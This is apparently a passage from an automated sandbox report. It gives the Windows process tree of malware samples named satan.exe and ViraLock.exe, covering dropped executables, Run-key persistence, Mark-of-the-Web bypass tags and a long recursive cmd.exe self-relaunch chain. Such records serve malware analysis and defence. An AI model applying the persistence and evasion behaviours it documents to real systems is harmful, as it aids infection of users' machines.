    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1908,10300507110523771928,10431451577263293318,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5608 /prefetch:8
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1956
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,10300507110523771928,10431451577263293318,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1
    3⤵
    PID:2092
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1908,10300507110523771928,10431451577263293318,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5500 /prefetch:8
    3⤵
    PID:1232
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1908,10300507110523771928,10431451577263293318,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=3924 /prefetch:8
    3⤵
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    PID:572
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,10300507110523771928,10431451577263293318,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4744 /prefetch:1
    3⤵
    PID:700
- - C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1908,10300507110523771928,10431451577263293318,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3920 /prefetch:8
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4608
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,10300507110523771928,10431451577263293318,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5648 /prefetch:1
    3⤵
    PID:4804
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,10300507110523771928,10431451577263293318,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5412 /prefetch:1
    3⤵
    PID:656
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,10300507110523771928,10431451577263293318,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4068 /prefetch:1
    3⤵
    PID:4664
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,10300507110523771928,10431451577263293318,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1
    3⤵
    PID:4372
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,10300507110523771928,10431451577263293318,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6140 /prefetch:1
    3⤵
    PID:2052
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,10300507110523771928,10431451577263293318,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6244 /prefetch:1
    3⤵
    PID:4696
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1908,10300507110523771928,10431451577263293318,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5944 /prefetch:8
    3⤵
    PID:1116
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1908,10300507110523771928,10431451577263293318,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6412 /prefetch:8
    3⤵
    - Subvert Trust Controls: Mark-of-the-Web Bypass
    - NTFS ADS
    - Suspicious behavior: EnumeratesProcesses
    PID:4492
- - C:\Users\Admin\Downloads\satan.exe
    "C:\Users\Admin\Downloads\satan.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    PID:4012
  - - C:\Users\Admin\Downloads\satan.exe
      "C:\Users\Admin\Downloads\satan.exe"
      4⤵
      Executes dropped EXE
      PID:3064
    - - C:\Users\Admin\AppData\Roaming\Leefy\orbeu.exe
        
        "C:\Users\Admin\AppData\Roaming\Leefy\orbeu.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:4264
      - C:\Users\Admin\AppData\Roaming\Leefy\orbeu.exe
        
        "C:\Users\Admin\AppData\Roaming\Leefy\orbeu.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:4464
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\tmp_9a9c8807.bat"
        5⤵
        
        PID:2120
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,10300507110523771928,10431451577263293318,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6744 /prefetch:1
    3⤵
    PID:4304
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1908,10300507110523771928,10431451577263293318,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7028 /prefetch:8
    3⤵
    PID:4012
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1908,10300507110523771928,10431451577263293318,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6596 /prefetch:8
    3⤵
    - Subvert Trust Controls: Mark-of-the-Web Bypass
    - NTFS ADS
    PID:3148
- - C:\Users\Admin\Downloads\ViraLock.exe
    "C:\Users\Admin\Downloads\ViraLock.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    PID:3964
  - - C:\Users\Admin\sGgswYoY\oqUgQMUM.exe
      "C:\Users\Admin\sGgswYoY\oqUgQMUM.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Drops file in System32 directory
      Suspicious behavior: GetForegroundWindowSpam
      PID:1240
  - - C:\ProgramData\rcMUYMwY\JgYkoUIo.exe
      "C:\ProgramData\rcMUYMwY\JgYkoUIo.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      PID:340
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
      4⤵
      PID:4932
    - - C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        5⤵
        Executes dropped EXE
        
        PID:4444
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        6⤵
        
        PID:4648
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        7⤵
        Executes dropped EXE
        
        PID:5096
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        8⤵
        
        PID:836
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        9⤵
        Executes dropped EXE
        
        PID:2628
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        10⤵
        
        PID:4540
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        11⤵
        Executes dropped EXE
        
        PID:2176
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        12⤵
        
        PID:3964
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        13⤵
        Executes dropped EXE
        
        PID:2420
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        14⤵
        
        PID:5004
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        15⤵
        Executes dropped EXE
        
        PID:5104
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        16⤵
        
        PID:3652
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        17⤵
        Executes dropped EXE
        
        PID:1592
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        18⤵
        
        PID:488
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        19⤵
        Executes dropped EXE
        
        PID:2180
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        20⤵
        
        PID:4648
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        21⤵
        Executes dropped EXE
        
        PID:788
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        22⤵
        
        PID:1844
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        23⤵
        Executes dropped EXE
        
        PID:5104
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        24⤵
        
        PID:2392
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        25⤵
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:3860
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        25⤵
        Executes dropped EXE
        
        PID:3868
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        26⤵
        
        PID:4484
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        27⤵
        Executes dropped EXE
        
        PID:8
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        28⤵
        
        PID:4540
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        29⤵
        Executes dropped EXE
        
        PID:2768
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        30⤵
        
        PID:3532
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        31⤵
        Executes dropped EXE
        
        PID:1984
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        32⤵
        
        PID:2848
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        33⤵
        Executes dropped EXE
        
        PID:1592
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        34⤵
        
        PID:3692
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        35⤵
        Executes dropped EXE
        
        PID:1828
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        36⤵
        
        PID:3680
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        37⤵
        Executes dropped EXE
        
        PID:3804
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        38⤵
        
        PID:4076
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        39⤵
        Executes dropped EXE
        
        PID:1900
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        40⤵
        
        PID:1860
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        41⤵
        Executes dropped EXE
        
        PID:1812
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        42⤵
        
        PID:4012
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        43⤵
        Executes dropped EXE
        
        PID:3568
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        44⤵
        
        PID:2940
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        45⤵
        Executes dropped EXE
        
        PID:4912
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        46⤵
        
        PID:2180
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        47⤵
        Executes dropped EXE
        
        PID:1900
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        48⤵
        
        PID:1352
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        49⤵
        Executes dropped EXE
        
        PID:4228
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        50⤵
        
        PID:2824
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        51⤵
        Executes dropped EXE
        
        PID:1924
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        52⤵
        
        PID:1984
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        53⤵
        Executes dropped EXE
        
        PID:2420
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        54⤵
        
        PID:3472
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        55⤵
        Executes dropped EXE
        
        PID:1068
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        56⤵
        
        PID:2768
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        57⤵
        Executes dropped EXE
        
        PID:3148
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        58⤵
        
        PID:4484
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        59⤵
        Executes dropped EXE
        
        PID:3804
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        60⤵
        
        PID:2940
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        61⤵
        Executes dropped EXE
        
        PID:1592
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        62⤵
        
        PID:4408
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        63⤵
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:2320
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        63⤵
        Executes dropped EXE
        
        PID:1860
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        64⤵
        
        PID:4548
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        65⤵
        Executes dropped EXE
        
        PID:1944
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        66⤵
        
        PID:4932
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        67⤵
        Executes dropped EXE
        
        PID:1352
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        68⤵
        
        PID:1812
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        69⤵
        Executes dropped EXE
        
        PID:4912
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        70⤵
        
        PID:5284
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        71⤵
        Executes dropped EXE
        
        PID:5464
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        72⤵
        
        PID:5808
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        73⤵
        Executes dropped EXE
        
        PID:5892
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        74⤵
        
        PID:5172
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        75⤵
        Executes dropped EXE
        
        PID:5340
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        76⤵
        
        PID:5796
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        77⤵
        Executes dropped EXE
        
        PID:5508
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        78⤵
        
        PID:2088
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        79⤵
        Executes dropped EXE
        
        PID:5492
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        80⤵
        
        PID:5756
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        81⤵
        Executes dropped EXE
        
        PID:1068
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        82⤵
        
        PID:5740
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        83⤵
        Executes dropped EXE
        
        PID:1444
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        84⤵
        
        PID:5828
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        85⤵
        Executes dropped EXE
        
        PID:6048
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        86⤵
        
        PID:3804
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        87⤵
        Executes dropped EXE
        
        PID:5204
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        88⤵
        
        PID:5720
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        89⤵
        Executes dropped EXE
        
        PID:5164
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        90⤵
        
        PID:1868
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        91⤵
        Executes dropped EXE
        
        PID:6072
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        92⤵
        
        PID:5968
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        93⤵
        
        PID:5524
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        94⤵
        
        PID:4188
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        95⤵
        System Location Discovery: System Language Discovery
        
        PID:4564
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        96⤵
        
        PID:5724
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        97⤵
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:6128
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        97⤵
        
        PID:5520
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        98⤵
        
        PID:5608
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        99⤵
        
        PID:6064
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        100⤵
        
        PID:1276
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        101⤵
        
        PID:5976
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        101⤵
        
        PID:5448
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        102⤵
        
        PID:5792
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        103⤵
        
        PID:5288
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        104⤵
        
        PID:5892
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        105⤵
        
        PID:5684
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        106⤵
        
        PID:3404
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        107⤵
        
        PID:4076
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        108⤵
        
        PID:5948
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        109⤵
        
        PID:4948
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        110⤵
        
        PID:8
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        111⤵
        System Location Discovery: System Language Discovery
        
        PID:5356
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        112⤵
        
        PID:5804
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        113⤵
        System Location Discovery: System Language Discovery
        
        PID:1068
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        114⤵
        
        PID:5652
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        115⤵
        
        PID:1276
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        116⤵
        
        PID:3680
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        117⤵
        
        PID:1260
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        118⤵
        
        PID:5556
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        119⤵
        
        PID:6068
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        120⤵
        
        PID:5300
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        121⤵
        
        PID:5848
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        122⤵
        
        PID:6120
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        123⤵
        
        PID:1924
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        124⤵
        
        PID:5172
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        125⤵
        
        PID:5488
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        126⤵
        
        PID:3964
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        127⤵
        
        PID:5528
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        128⤵
        
        PID:2628
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        129⤵
        
        PID:5672
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        130⤵
        
        PID:4932
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        131⤵
        
        PID:3828
        
        C:\Windows\SysWOW64\cmd.exe
        
